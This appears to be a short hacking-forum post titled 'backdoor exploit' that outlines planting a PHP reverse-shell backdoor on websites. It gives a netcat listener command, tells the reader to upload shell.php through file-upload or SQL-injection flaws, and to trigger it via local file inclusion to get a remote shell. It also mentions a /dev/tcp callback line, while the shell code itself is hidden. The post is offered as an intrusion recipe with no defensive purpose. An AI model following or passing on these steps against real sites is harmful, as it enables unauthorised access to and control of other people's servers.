backdoor exploit

  1. SIMPLE PHP REVERSE SHELL BACKDOOR

    First, listen for incoming connections: nc -l -p 4444 Upload shell.php to a site via file upload vulnerability or sqli, view shell.php via url in browser thanks to LFI(Local File Inclusion) vulnerability and get reverse shell! Hidden content Note: Remove "#(/dev/tcp/ip/port)" from shell.php